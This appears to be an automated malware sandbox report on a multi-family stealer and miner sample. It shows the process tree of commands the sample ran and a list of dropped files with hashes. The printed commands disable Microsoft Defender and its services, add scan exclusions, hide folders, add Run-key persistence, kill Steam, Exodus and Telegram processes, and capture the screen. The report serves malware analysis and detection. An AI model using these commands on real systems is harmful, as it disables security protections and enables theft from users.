                                                                    • Executes a command shell one-liner
                                                                    PID:988
                                                                    • C:\Windows\system32\reg.exe
                                                                      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SubmitSamplesConsent /t REG_DWORD /d 2 /f
                                                                      4⤵
                                                                        PID:2040
                                                                    • C:\Windows\system32\cmd.exe
                                                                      C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -NoProfile -NonInteractive -ExecutionPolicy Bypass -WindowStyle Hidden -Command "Set-MpPreference -DisableRealtimeMonitoring $true -ErrorAction SilentlyContinue; Set-MpPreference -DisableScriptScanning $true -ErrorAction SilentlyContinue; Set-MpPreference -DisableBehaviorMonitoring $true -ErrorAction SilentlyContinue; Set-MpPreference -DisableIOAVProtection $true -ErrorAction SilentlyContinue; Set-MpPreference -DisableIntrusionPreventionSystem $true -ErrorAction SilentlyContinue; Set-MpPreference -DisableArchiveScanning $true -ErrorAction SilentlyContinue; Set-MpPreference -DisableBlockAtFirstSeen $true -ErrorAction SilentlyContinue; Set-MpPreference -MAPSReporting Disabled -ErrorAction SilentlyContinue; Set-MpPreference -SubmitSamplesConsent NeverSend -ErrorAction SilentlyContinue; Set-MpPreference -PUAProtection Disabled -ErrorAction SilentlyContinue""
                                                                      3⤵
                                                                      • Disables one or more Microsoft Defender components
                                                                      • Hide Artifacts: Hidden Window
                                                                      • Hide Artifacts: Ignore Process Interrupts
                                                                      PID:6060
                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        powershell.exe -NoProfile -NonInteractive -ExecutionPolicy Bypass -WindowStyle Hidden -Command "Set-MpPreference -DisableRealtimeMonitoring $true -ErrorAction SilentlyContinue; Set-MpPreference -DisableScriptScanning $true -ErrorAction SilentlyContinue; Set-MpPreference -DisableBehaviorMonitoring $true -ErrorAction SilentlyContinue; Set-MpPreference -DisableIOAVProtection $true -ErrorAction SilentlyContinue; Set-MpPreference -DisableIntrusionPreventionSystem $true -ErrorAction SilentlyContinue; Set-MpPreference -DisableArchiveScanning $true -ErrorAction SilentlyContinue; Set-MpPreference -DisableBlockAtFirstSeen $true -ErrorAction SilentlyContinue; Set-MpPreference -MAPSReporting Disabled -ErrorAction SilentlyContinue; Set-MpPreference -SubmitSamplesConsent NeverSend -ErrorAction SilentlyContinue; Set-MpPreference -PUAProtection Disabled -ErrorAction SilentlyContinue"
                                                                        4⤵
                                                                        • Command and Scripting Interpreter: PowerShell
                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                        PID:5236
                                                                    • C:\Windows\system32\cmd.exe
                                                                      C:\Windows\system32\cmd.exe /d /s /c "sc stop WinDefend"
                                                                      3⤵
                                                                      • Executes a command shell one-liner
                                                                      PID:2688
                                                                      • C:\Windows\system32\sc.exe
                                                                        sc stop WinDefend
                                                                        4⤵
                                                                        • Launches sc.exe
                                                                        PID:4920
                                                                    • C:\Windows\system32\cmd.exe
                                                                      C:\Windows\system32\cmd.exe /d /s /c "sc config WinDefend start= disabled"
                                                                      3⤵
                                                                      • Executes a command shell one-liner
                                                                      PID:2424
                                                                      • C:\Windows\system32\sc.exe
                                                                        sc config WinDefend start= disabled
                                                                        4⤵
                                                                        • Launches sc.exe
                                                                        PID:1304
                                                                    • C:\Windows\system32\cmd.exe
                                                                      C:\Windows\system32\cmd.exe /d /s /c "sc stop SecurityHealthService"
                                                                      3⤵
                                                                      • Executes a command shell one-liner
                                                                      PID:5312
                                                                      • C:\Windows\system32\sc.exe
                                                                        sc stop SecurityHealthService
                                                                        4⤵
                                                                        • Launches sc.exe
                                                                        PID:1216
                                                                    • C:\Windows\system32\cmd.exe
                                                                      C:\Windows\system32\cmd.exe /d /s /c "sc config SecurityHealthService start= disabled"
                                                                      3⤵
                                                                      • Executes a command shell one-liner
                                                                      PID:5388
                                                                      • C:\Windows\system32\sc.exe
                                                                        sc config SecurityHealthService start= disabled
                                                                        4⤵
                                                                        • Launches sc.exe
                                                                        PID:3688
                                                                    • C:\Windows\system32\cmd.exe
                                                                      C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -NoProfile -NonInteractive -ExecutionPolicy Bypass -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Microsoft\Windows\ShellExperience\2026-08-24_d72cac618cdc5222f55e5f6515340dd9_blankgrabber_coinminer_glassworm_icedid_luca-stealer_njrat_stealc_zxxz.exe' -ErrorAction SilentlyContinue""
                                                                      3⤵
                                                                      • Prevents Microsoft Defender from scanning certain paths by adding an exclusion.
                                                                      • Hide Artifacts: Hidden Window
                                                                      • Hide Artifacts: Ignore Process Interrupts
                                                                      PID:1136
                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        powershell.exe -NoProfile -NonInteractive -ExecutionPolicy Bypass -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Microsoft\Windows\ShellExperience\2026-08-24_d72cac618cdc5222f55e5f6515340dd9_blankgrabber_coinminer_glassworm_icedid_luca-stealer_njrat_stealc_zxxz.exe' -ErrorAction SilentlyContinue"
                                                                        4⤵
                                                                        • Command and Scripting Interpreter: PowerShell
                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                        PID:1060
                                                                    • C:\Windows\system32\cmd.exe
                                                                      C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -NoProfile -NonInteractive -ExecutionPolicy Bypass -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath '$env:TEMP' -ErrorAction SilentlyContinue""
                                                                      3⤵
                                                                      • Prevents Microsoft Defender from scanning certain paths by adding an exclusion.
                                                                      • Hide Artifacts: Hidden Window
                                                                      • Hide Artifacts: Ignore Process Interrupts
                                                                      PID:5712
                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        powershell.exe -NoProfile -NonInteractive -ExecutionPolicy Bypass -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath '$env:TEMP' -ErrorAction SilentlyContinue"
                                                                        4⤵
                                                                        • Command and Scripting Interpreter: PowerShell
                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                        PID:5196
                                                                    • C:\Windows\system32\cmd.exe
                                                                      C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -NoProfile -NonInteractive -ExecutionPolicy Bypass -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath '$env:APPDATA' -ErrorAction SilentlyContinue""
                                                                      3⤵
                                                                      • Prevents Microsoft Defender from scanning certain paths by adding an exclusion.
                                                                      • Hide Artifacts: Hidden Window
                                                                      • Hide Artifacts: Ignore Process Interrupts
                                                                      PID:3628
                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        powershell.exe -NoProfile -NonInteractive -ExecutionPolicy Bypass -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath '$env:APPDATA' -ErrorAction SilentlyContinue"
                                                                        4⤵
                                                                        • Command and Scripting Interpreter: PowerShell
                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                        PID:3936
                                                                    • C:\Windows\system32\cmd.exe
                                                                      C:\Windows\system32\cmd.exe /d /s /c "powershell -NoProfile -Command "(Get-MpPreference).DisableRealtimeMonitoring""
                                                                      3⤵
                                                                      • Executes a command shell one-liner
                                                                      PID:6092
                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        powershell -NoProfile -Command "(Get-MpPreference).DisableRealtimeMonitoring"
                                                                        4⤵
                                                                        • Command and Scripting Interpreter: PowerShell
                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                        PID:1804
                                                                    • C:\Windows\system32\cmd.exe
                                                                      C:\Windows\system32\cmd.exe /d /s /c "attrib +h +s "C:\Users\Admin\AppData\Local\Microsoft\Windows\ShellExperience""
                                                                      3⤵
                                                                      • Hide Artifacts: Hidden Files and Directories
                                                                      PID:4108
                                                                      • C:\Windows\system32\attrib.exe
                                                                        attrib +h +s "C:\Users\Admin\AppData\Local\Microsoft\Windows\ShellExperience"
                                                                        4⤵
                                                                        • Views/modifies file attributes
                                                                        PID:5080
                                                                    • C:\Windows\system32\cmd.exe
                                                                      C:\Windows\system32\cmd.exe /d /s /c "powershell -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Microsoft\Windows\ShellExperience'; Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Microsoft\Windows\ShellExperience\2026-08-24_d72cac618cdc5222f55e5f6515340dd9_blankgrabber_coinminer_glassworm_icedid_luca-stealer_njrat_stealc_zxxz.exe'; Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Microsoft\Windows\ShellExperience\2026-08-24_d72cac618cdc5222f55e5f6515340dd9_blankgrabber_coinminer_glassworm_icedid_luca-stealer_njrat_stealc_zxxz.exe'""
                                                                      3⤵
                                                                      • Executes a command shell one-liner
                                                                      PID:2804
                                                                      • C:\Windows\System32\Conhost.exe
                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        4⤵
                                                                          PID:3964
                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          powershell -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Microsoft\Windows\ShellExperience'; Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Microsoft\Windows\ShellExperience\2026-08-24_d72cac618cdc5222f55e5f6515340dd9_blankgrabber_coinminer_glassworm_icedid_luca-stealer_njrat_stealc_zxxz.exe'; Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Microsoft\Windows\ShellExperience\2026-08-24_d72cac618cdc5222f55e5f6515340dd9_blankgrabber_coinminer_glassworm_icedid_luca-stealer_njrat_stealc_zxxz.exe'"
                                                                          4⤵
                                                                          • Command and Scripting Interpreter: PowerShell
                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                          PID:4968
                                                                      • C:\Windows\system32\cmd.exe
                                                                        C:\Windows\system32\cmd.exe /d /s /c "reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "ShellExperienceHost" /t REG_SZ /d ""C:\Users\Admin\AppData\Local\Microsoft\Windows\ShellExperience\2026-08-24_d72cac618cdc5222f55e5f6515340dd9_blankgrabber_coinminer_glassworm_icedid_luca-stealer_njrat_stealc_zxxz.exe"" /f"
                                                                        3⤵
                                                                        • Executes a command shell one-liner
                                                                        PID:3156
                                                                        • C:\Windows\system32\reg.exe
                                                                          reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "ShellExperienceHost" /t REG_SZ /d ""C:\Users\Admin\AppData\Local\Microsoft\Windows\ShellExperience\2026-08-24_d72cac618cdc5222f55e5f6515340dd9_blankgrabber_coinminer_glassworm_icedid_luca-stealer_njrat_stealc_zxxz.exe"" /f
                                                                          4⤵
                                                                          • Adds Run key to start application
                                                                          PID:4512
                                                                      • C:\Windows\system32\cmd.exe
                                                                        C:\Windows\system32\cmd.exe /d /s /c "reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ShellExperienceHost" /t REG_SZ /d ""C:\Users\Admin\AppData\Local\Microsoft\Windows\ShellExperience\2026-08-24_d72cac618cdc5222f55e5f6515340dd9_blankgrabber_coinminer_glassworm_icedid_luca-stealer_njrat_stealc_zxxz.exe"" /f"
                                                                        3⤵
                                                                        • Executes a command shell one-liner
                                                                        PID:3164
                                                                        • C:\Windows\system32\reg.exe
                                                                          reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ShellExperienceHost" /t REG_SZ /d ""C:\Users\Admin\AppData\Local\Microsoft\Windows\ShellExperience\2026-08-24_d72cac618cdc5222f55e5f6515340dd9_blankgrabber_coinminer_glassworm_icedid_luca-stealer_njrat_stealc_zxxz.exe"" /f
                                                                          4⤵
                                                                          • Adds Run key to start application
                                                                          PID:3724
                                                                      • C:\Windows\system32\cmd.exe
                                                                        C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM Steam.exe /F"
                                                                        3⤵
                                                                        • Executes a command shell one-liner
                                                                        PID:1356
                                                                        • C:\Windows\system32\taskkill.exe
                                                                          taskkill /IM Steam.exe /F
                                                                          4⤵
                                                                          • Kills process with taskkill
                                                                          PID:5236
                                                                      • C:\Windows\system32\cmd.exe
                                                                        C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM javaw.exe /F"
                                                                        3⤵
                                                                        • Executes a command shell one-liner
                                                                        PID:1692
                                                                        • C:\Windows\system32\taskkill.exe
                                                                          taskkill /IM javaw.exe /F
                                                                          4⤵
                                                                          • Kills process with taskkill
                                                                          PID:4752
                                                                      • C:\Windows\system32\cmd.exe
                                                                        C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM Exodus.exe /F"
                                                                        3⤵
                                                                        • Executes a command shell one-liner
                                                                        PID:5416
                                                                        • C:\Windows\system32\taskkill.exe
                                                                          taskkill /IM Exodus.exe /F
                                                                          4⤵
                                                                          • Kills process with taskkill
                                                                          PID:3688
                                                                      • C:\Windows\system32\cmd.exe
                                                                        C:\Windows\system32\cmd.exe /d /s /c "powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "Add-Type -AssemblyName System.Windows.Forms,System.Drawing; $bounds = [System.Windows.Forms.Screen]::PrimaryScreen.Bounds; $bitmap = New-Object System.Drawing.Bitmap $bounds.Width, $bounds.Height; $graphics = [System.Drawing.Graphics]::FromImage($bitmap); $graphics.CopyFromScreen($bounds.X, $bounds.Y, 0, 0, $bounds.Size); $memoryStream = New-Object System.IO.MemoryStream; $bitmap.Save($memoryStream, [System.Drawing.Imaging.ImageFormat]::Png); $bytes = $memoryStream.ToArray(); [System.Console]::OpenStandardOutput().Write($bytes, 0, $bytes.Length); $bitmap.Dispose(); $graphics.Dispose(); $memoryStream.Dispose();""
                                                                        3⤵
                                                                        • Executes a command shell one-liner
                                                                        PID:3700
                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "Add-Type -AssemblyName System.Windows.Forms,System.Drawing; $bounds = [System.Windows.Forms.Screen]::PrimaryScreen.Bounds; $bitmap = New-Object System.Drawing.Bitmap $bounds.Width, $bounds.Height; $graphics = [System.Drawing.Graphics]::FromImage($bitmap); $graphics.CopyFromScreen($bounds.X, $bounds.Y, 0, 0, $bounds.Size); $memoryStream = New-Object System.IO.MemoryStream; $bitmap.Save($memoryStream, [System.Drawing.Imaging.ImageFormat]::Png); $bytes = $memoryStream.ToArray(); [System.Console]::OpenStandardOutput().Write($bytes, 0, $bytes.Length); $bitmap.Dispose(); $graphics.Dispose(); $memoryStream.Dispose();"
                                                                          4⤵
                                                                          • Command and Scripting Interpreter: PowerShell
                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                          PID:3460
                                                                      • C:\Windows\system32\cmd.exe
                                                                        C:\Windows\system32\cmd.exe /d /s /c "tasklist /FO CSV /NH"
                                                                        3⤵
                                                                        • Executes a command shell one-liner
                                                                        PID:5840
                                                                        • C:\Windows\system32\tasklist.exe
                                                                          tasklist /FO CSV /NH
                                                                          4⤵
                                                                          • Discovers running processes
                                                                          PID:4416
                                                                      • C:\Windows\system32\cmd.exe
                                                                        C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM Telegram.exe /F"
                                                                        3⤵
                                                                        • Executes a command shell one-liner
                                                                        PID:1152
                                                                        • C:\Windows\system32\taskkill.exe
                                                                          taskkill /IM Telegram.exe /F
                                                                          4⤵
                                                                          • Kills process with taskkill
                                                                          PID:5436

                                                                  Network

                                                                        MITRE ATT&CK Enterprise v16

                                                                        Replay Monitor

                                                                        Loading Replay Monitor...

                                                                        Downloads

                                                                        ._wdm

                                                                        • Path C:\ProgramData\._wdm
                                                                        • Size 469B
                                                                        • SHA256 e0529217b3d3f2fb285bbb8035a71be3362b36af008ef146463e14ba2e351ec5
                                                                        • MD5 SHA1 SHA512 TLSH

                                                                        ModuleAnalysisCache

                                                                        • Path C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                                                                        • Size 67KB
                                                                        • SHA256 d18285b58743ea648b8945122e6ec07c806201c7bbc3ca2c1d882a18510ccb33
                                                                        • MD5 SHA1 SHA512 SSDEEP TLSH

                                                                        StartupProfileData-NonInteractive

                                                                        • Path C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                        • Size 1KB
                                                                        • SHA256 bad13808bdd1fccf90f960aba6e264f55ae57edd5273677bb62bdc9b0865d9d8
                                                                        • MD5 SHA1 SHA512 TLSH

                                                                        StartupProfileData-NonInteractive

                                                                        • Path C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                        • Size 1KB
                                                                        • SHA256 3f8e0c512b8b526b4dae97c1a050056fdb092fed47c9323a198a7c5a80dcf216
                                                                        • MD5 SHA1 SHA512 TLSH

                                                                        StartupProfileData-NonInteractive

                                                                        • Path C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                        • Size 952B
                                                                        • SHA256 1321a719825d2d8d2d9135e551e460635bdfeb75be0927c3df7bfb87c450b575
                                                                        • MD5 SHA1 SHA512 TLSH

                                                                        StartupProfileData-NonInteractive

                                                                        • Path C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                        • Size 1KB
                                                                        • SHA256 d9bcc0a509b8b4591a17a27771f07e09cbb9fb23522165ebae951ef1a1e32398
                                                                        • MD5 SHA1 SHA512 TLSH

                                                                        StartupProfileData-NonInteractive

                                                                        • Path C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                        • Size 1KB
                                                                        • SHA256 9765b2cf3f8817722a15559255b627222393d9b82a1933ba551ea573f825b211
                                                                        • MD5 SHA1 SHA512 TLSH

                                                                        StartupProfileData-NonInteractive

                                                                        • Path C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                        • Size 952B
                                                                        • SHA256 6a24b7ee4fb2347333879a5fb5b37c3a07a83a0ef0c172b4e697cfba30691706
                                                                        • MD5 SHA1 SHA512 TLSH

                                                                        StartupProfileData-NonInteractive

                                                                        • Path C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                        • Size 1KB
                                                                        • SHA256 422de0b8164b1574612da16121525c134866f84a5b8f73d108a646df6de51829
                                                                        • MD5 SHA1 SHA512 TLSH

                                                                        StartupProfileData-NonInteractive

                                                                        • Path C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                        • Size 1KB
                                                                        • SHA256 ee8b6e951e7c2a5c8b166cf67e955be555b89477d0b501672c059383bf05abf5
                                                                        • MD5 SHA1 SHA512 TLSH

                                                                        StartupProfileData-NonInteractive

                                                                        • Path C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                        • Size 1KB
                                                                        • SHA256 d28ef187840dcd1fe0a8a757ef9cd326023bec38b39ef1338f91d508d55dcf28
                                                                        • MD5 SHA1 SHA512 TLSH

                                                                        StartupProfileData-NonInteractive

                                                                        • Path C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                        • Size 1KB
                                                                        • SHA256 d07f8e61829bc6f5856990cd00bf087fd9dacfb9ea9264108d902aad70a81f95
                                                                        • MD5 SHA1 SHA512 TLSH

                                                                        StartupProfileData-NonInteractive

                                                                        • Path C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                        • Size 1KB
                                                                        • SHA256 dc37dfb976940b1fddf6bb3e152c81e341a735be2d115a1f8b4d2d81ab98b83f
                                                                        • MD5 SHA1 SHA512 TLSH

                                                                        StartupProfileData-NonInteractive

                                                                        • Path C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                        • Size 1KB
                                                                        • SHA256 046d07c5d21957497e551029d0af030724756bdbb22c649702f9d0e33fd3b35d
                                                                        • MD5 SHA1 SHA512 TLSH

                                                                        StartupProfileData-NonInteractive

                                                                        • Path C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                        • Size 1KB
                                                                        • SHA256 6da9d90c9e0d60ac0519e0004b58a1ce32bd1f9e430e2786d3993ecdea7f5c0b
                                                                        • MD5 SHA1 SHA512 TLSH

                                                                        nyx.log

                                                                        • Path C:\Users\Admin\AppData\Local\Temp\2\nyx.log
                                                                        • Size 1KB
                                                                        • SHA256 e19a529b69454c9b74a02dfcf2987719243c7e6f937d7190d1b8c865d92818d5
                                                                        • MD5 SHA1 SHA512 TLSH

                                                                        nyx.log

                                                                        • Path C:\Users\Admin\AppData\Local\Temp\2\nyx.log
                                                                        • Size 2KB
                                                                        • SHA256 73c74d5616c0f0be0df7164cbec631d71c673966f66e55e7c175649b29f7087c
                                                                        • MD5 SHA1 SHA512 TLSH

                                                                        nyx.log

                                                                        • Path C:\Users\Admin\AppData\Local\Temp\2\nyx.log
                                                                        • Size 3KB
                                                                        • SHA256 ff7922ca1e2738bbac7c63bd4f92da8048486d2ed19adadf3582379e5cefc6f5
                                                                        • MD5 SHA1 SHA512 TLSH

                                                                        nyx.log

                                                                        • Path C:\Users\Admin\AppData\Local\Temp\2\nyx.log
                                                                        • Size 936B
                                                                        • SHA256 844c5f148189ebb3b775cec688c902e0facee62c6731b2b624da2501457bf437
                                                                        • MD5 SHA1 SHA512 TLSH

                                                                        nyx.log

                                                                        • Path C:\Users\Admin\AppData\Local\Temp\2\nyx.log
                                                                        • Size 1KB
                                                                        • SHA256 2aaf942816dbf00550cc99c43b7ff0b18b3d674a5f85a27fadc294c6babb1222
                                                                        • MD5 SHA1 SHA512 TLSH

                                                                        RES1DFE.tmp

                                                                        • Path C:\Users\Admin\AppData\Local\Temp\RES1DFE.tmp
                                                                        • Size 1KB
                                                                        • SHA256 0658507aa4c9b9316c55b3d53f9b439288c4f15b3bdd3973dee312c72fd513bd
                                                                        • MD5 SHA1 SHA512 TLSH

                                                                        RES6EED.tmp

                                                                        • Path C:\Users\Admin\AppData\Local\Temp\RES6EED.tmp
                                                                        • Size 1KB
                                                                        • SHA256 f631cbc4ec2123d6abdca4ef62f2f1b15a33f8d5a2a7bc8a4b9bc4969f76783e
                                                                        • MD5 SHA1 SHA512 TLSH

                                                                        SystemService_README.txt

                                                                        • Path C:\Users\Admin\AppData\Local\Temp\SystemService_README.txt
                                                                        • Size 251B
                                                                        • SHA256 740c29c6b96a4ea858f2261b59549d12473e8cfdfa515e6cf9162659f8290093
                                                                        • MD5 SHA1 SHA512 TLSH

                                                                        __PSScriptPolicyTest_oph2yze1.ggi.ps1

                                                                        • Path C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_oph2yze1.ggi.ps1
                                                                        • Size 60B
                                                                        • SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
                                                                        • MD5 SHA1 SHA512 TLSH

                                                                        ioo5j3hh.dll

                                                                        • Path C:\Users\Admin\AppData\Local\Temp\ioo5j3hh\ioo5j3hh.dll
                                                                        • Size 6KB
                                                                        • SHA256 c1e22c8bb9359b7662521838427d761d8ee48dee33498e7661e08407f527dfa1
                                                                        • MD5 SHA1 SHA512 SSDEEP TLSH

                                                                        kxq55h1h.dll

                                                                        • Path C:\Users\Admin\AppData\Local\Temp\kxq55h1h\kxq55h1h.dll
                                                                        • Size 6KB
                                                                        • SHA256 ccdd079fd3f789b11a74e0942e036913f7834825975a63477f83c601b9101428
                                                                        • MD5 SHA1 SHA512 SSDEEP TLSH

                                                                        svchost.vbs

                                                                        • Path C:\Users\Admin\AppData\Local\Temp\svchost.vbs
                                                                        • Size 407B
                                                                        • SHA256 fc79baee67a6c261b1601f8fd56f38f5bc25bed50e03b917e4f290f8c4b5736c
                                                                        • MD5 SHA1 SHA512 TLSH

                                                                        system_check_1787614485866.vbs

                                                                        • Path C:\Users\Admin\AppData\Local\Temp\system_check_1787614485866.vbs
                                                                        • Size 216B
                                                                        • SHA256 600663b0860f7c0f136c9a9fb273d878feea20ba12222e68742da5ff7d18ccb4
                                                                        • MD5 SHA1 SHA512 TLSH

                                                                        system_check_1787614506771.vbs

                                                                        • Path C:\Users\Admin\AppData\Local\Temp\system_check_1787614506771.vbs
                                                                        • Size 212B
                                                                        • SHA256 b1e3a51dab45d473d8772cab626ad93699e1b4de07852b0f8b008bd88c91095c
                                                                        • MD5 SHA1 SHA512 TLSH

                                                                        version.txt

                                                                        • Path C:\Users\Admin\AppData\Local\Temp\version.txt
                                                                        • Size 7B
                                                                        • SHA256 52ab14a48cb941963a498faefd02b1090ebfccfe47f07d5452628d8280b60154
                                                                        • MD5 SHA1 SHA512

                                                                        service.log

                                                                        • Path C:\Users\Admin\AppData\Roaming\WindowsSystemService\Logs\service.log
                                                                        • Size 360B
                                                                        • SHA256 736a9c9bede9762281d3f2a3e8400a944366919dff54bb2cb4108702dfaece7c
                                                                        • MD5 SHA1 SHA512 TLSH

                                                                        config.json

                                                                        • Path C:\Users\Admin\AppData\Roaming\WindowsSystemService\config.json
                                                                        • Size 214B
                                                                        • SHA256 3e1646a5f4614fb0d954ed3e8efb61e5bc25fb3a963eaeb8724b8dc084ea11c6
                                                                        • MD5 SHA1 SHA512 TLSH

                                                                        CSCEB4168607D78488C9558F9D470D8A2C2.TMP

                                                                        • Path \??\c:\Users\Admin\AppData\Local\Temp\ioo5j3hh\CSCEB4168607D78488C9558F9D470D8A2C2.TMP
                                                                        • Size 652B
                                                                        • SHA256 918f9b6872117e67f109961e6fe600552a971a5a12dc43ef50d349b1101b1716
                                                                        • MD5 SHA1 SHA512 TLSH

                                                                        ioo5j3hh.0.cs

                                                                        • Path \??\c:\Users\Admin\AppData\Local\Temp\ioo5j3hh\ioo5j3hh.0.cs
                                                                        • Size 3KB
                                                                        • SHA256 868802e231aa72b11867164e6adc4e844bd061716684ae8c550e87b3d79b609d
                                                                        • MD5 SHA1 SHA512 TLSH

                                                                        ioo5j3hh.cmdline

                                                                        • Path \??\c:\Users\Admin\AppData\Local\Temp\ioo5j3hh\ioo5j3hh.cmdline
                                                                        • Size 607B
                                                                        • SHA256 b320928177de6816611c61633112caf18a815e732ae66946d7e6e5d5cc450ea9
                                                                        • MD5 SHA1 SHA512 TLSH

                                                                        CSC33CC698D334A368FE1C886A1124F3.TMP

                                                                        • Path \??\c:\Users\Admin\AppData\Local\Temp\kxq55h1h\CSC33CC698D334A368FE1C886A1124F3.TMP
                                                                        • Size 652B
                                                                        • SHA256 7dc2e08820e14397f9063c1da276b5a7662e2be6a5cd1b90c2d14df822ac1ab7
                                                                        • MD5 SHA1 SHA512 TLSH

                                                                        kxq55h1h.cmdline

                                                                        • Path \??\c:\Users\Admin\AppData\Local\Temp\kxq55h1h\kxq55h1h.cmdline
                                                                        • Size 607B
                                                                        • SHA256 d20995d864f3204d95166aaf2bb4a0734032ea5de24802b35ffed5f9c84ed196
                                                                        • MD5 SHA1 SHA512 TLSH

                                                                        memory/596-35-0x00000160E4B70000-0x00000160E4B78000-memory.dmp

                                                                        memory/1044-138-0x00000230E02A0000-0x00000230E0C44000-memory.dmp

                                                                        memory/1616-2-0x00000207D5CC0000-0x00000207D5CE2000-memory.dmp

                                                                        memory/3348-140-0x0000021CA5CD0000-0x0000021CA5CD8000-memory.dmp

                                                                        memory/3456-30-0x000002392A360000-0x000002392AD04000-memory.dmp

                                                                        memory/5584-44-0x0000019959C50000-0x0000019959C6E000-memory.dmp

                                                                        memory/5584-45-0x0000019959EF0000-0x0000019959FA2000-memory.dmp

                                                                        memory/5584-46-0x0000019959C00000-0x0000019959C0A000-memory.dmp